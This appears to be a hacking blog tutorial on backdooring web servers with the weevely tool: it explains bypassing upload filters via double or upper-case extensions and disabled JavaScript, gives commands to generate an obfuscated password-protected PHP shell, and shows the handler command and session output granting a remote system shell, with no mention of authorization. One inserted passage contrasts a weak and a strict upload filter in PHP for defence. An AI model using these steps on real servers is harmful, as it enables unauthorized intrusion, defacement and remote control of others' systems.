How to backdoor and deface a web server using weevely

Almost 82% of servers on the web run PHP. It's a simple open-source server-side scripting language. A website mostly consists of PHP, HTML, CSS and JavaScript. Of these, PHP interacts directly with the server, i.e. it does the logical calculations and so on, while the other languages are for the user interface. PHP can also contact an SQL server to retrieve and write data.

In computing, a backdoor is a method of accessing a system remotely without proper authentication. These backdoors can have access to the whole system and are capable of executing system commands. Here we are using weevely to generate and handle a PHP backdoor. Weevely is a built-in tool in Kali Linux that can generate obfuscated PHP shell scripts and control them remotely. Most systems are compromised via shell upload. An image upload or file upload feature in a web server can have many vulnerabilities. Saving the raw uploaded file on the server is a bad idea: a hacker can root the server by uploading malware if he knows the path of the upload. Another vulnerability is image upload: through an image upload feature a user can upload any type of file to the server if it's not filtered properly. Some webmasters implement JavaScript to filter the upload, but a hacker can upload his shell by disabling JavaScript in the browser. Server-side filters are also sometimes written so that they only check for the string “.jpg” or “.png” in the file name. This can be exploited by renaming the shell like this: “shell.jpg.php”. Once you find an upload vulnerability you can use weevely.


Weevely requires modules such as a SOCKS handler, so we need to install all the required libraries.
# sudo apt-get install python-pip libyaml-dev
# sudo pip install prettytable Mako pyaml dateutils pysocks --upgrade

Generating backdoor

Let's generate a password-protected backdoor so that others cannot get unauthorized access to our shell. Run the command:

# weevely generate password /root/Desktop/backdoor.php

A PHP file will be generated on the desktop with the password “password”. We have to upload this file to the target web server. For that you have to find some upload vulnerability or get FTP access. Image upload features on websites are a great chance of getting your shell onto the server. Rename the backdoor to “backdoor.jpg.php” or “backdoor.PHP” to bypass verification; sometimes disabling JavaScript in the browser will help. Somehow upload the file to the target server, but make sure you know the directory all these uploads go into. Mostly images will be in the “/images” or “/photos” directories.
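The renaming tricks in the two upload passages above (“shell.jpg.php”, “backdoor.PHP”) only work against a filter that looks for “.jpg” or “.png” somewhere in the name or compares extensions case-sensitively. As an added example (not part of the original post; the function names and sample uploads are constructed), here is that weak check next to a stricter server-side one:

```php
<?php
// Added example; function names and sample uploads are constructed.

// The weak check from the text: passes any name that contains ".jpg" or ".png".
function weak_filter(string $name): bool {
    return strpos($name, '.jpg') !== false || strpos($name, '.png') !== false;
}

// Stricter check: exactly one extension, compared case-insensitively against
// an allow-list, plus matching magic bytes. Returns the server-chosen name
// to store the file under, or null to reject.
function strict_filter(string $name, string $bytes): ?string {
    $magic = ['jpg' => "\xFF\xD8\xFF", 'png' => "\x89PNG\r\n\x1a\n"];
    $parts = explode('.', strtolower(basename($name)));
    if (count($parts) !== 2 || $parts[0] === '') {
        return null;                      // "shell.jpg.php", ".htaccess", no extension
    }
    $ext = $parts[1];
    if (!isset($magic[$ext])) {
        return null;                      // "backdoor.PHP" folds to "php": not allowed
    }
    if (strncmp($bytes, $magic[$ext], strlen($magic[$ext])) !== 0) {
        return null;                      // extension says image, content does not
    }
    return bin2hex(random_bytes(16)) . '.' . $ext;   // never reuse the client name
}

// Constructed sample uploads: [client filename, first bytes of the body].
$jpeg   = "\xFF\xD8\xFF\xE0" . str_repeat("\0", 16);
$script = '<?php // constructed placeholder body';
$samples = [
    ['holiday.jpg',   $jpeg],
    ['shell.jpg.php', $script],
    ['backdoor.PHP',  $script],
    ['renamed.jpg',   $script],
];

foreach ($samples as [$name, $bytes]) {
    printf("%-14s weak=%-6s strict=%s\n",
        $name,
        weak_filter($name) ? 'accept' : 'reject',
        strict_filter($name, $bytes) === null ? 'reject' : 'accept');
}
```

Serving uploads from a directory where the web server does not execute PHP, or from outside the document root, limits the damage if a file still gets through.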


Executing the payload

Moving on to the handler section: you just need to know the directory of the script on the server, say the “/images” directory. Run the command:
# weevely "" password
This will give you an SSH-like interface from which you can control the server remotely.

root@khromozome:~# weevely "http://localhost/backdoor.php" password
[+] weevely 3.2.0

[+] Target: www-data@khromozome:/var/www/html
[+] Session: /root/.weevely/sessions/localhost/backdoor_0.session
[+] Shell: System shell

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.


Tadaaaa… now the server is yours. Use the help command for more info.

weevely> help

You can execute system shell commands, networking commands and file system commands.

susmith HCK


I’m a computer enthusiast basically and I love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and I would like to explore security vulnerabilities and the latest tech news and want to share them with you. If you like all this stuff, add me on Facebook and Google Plus.
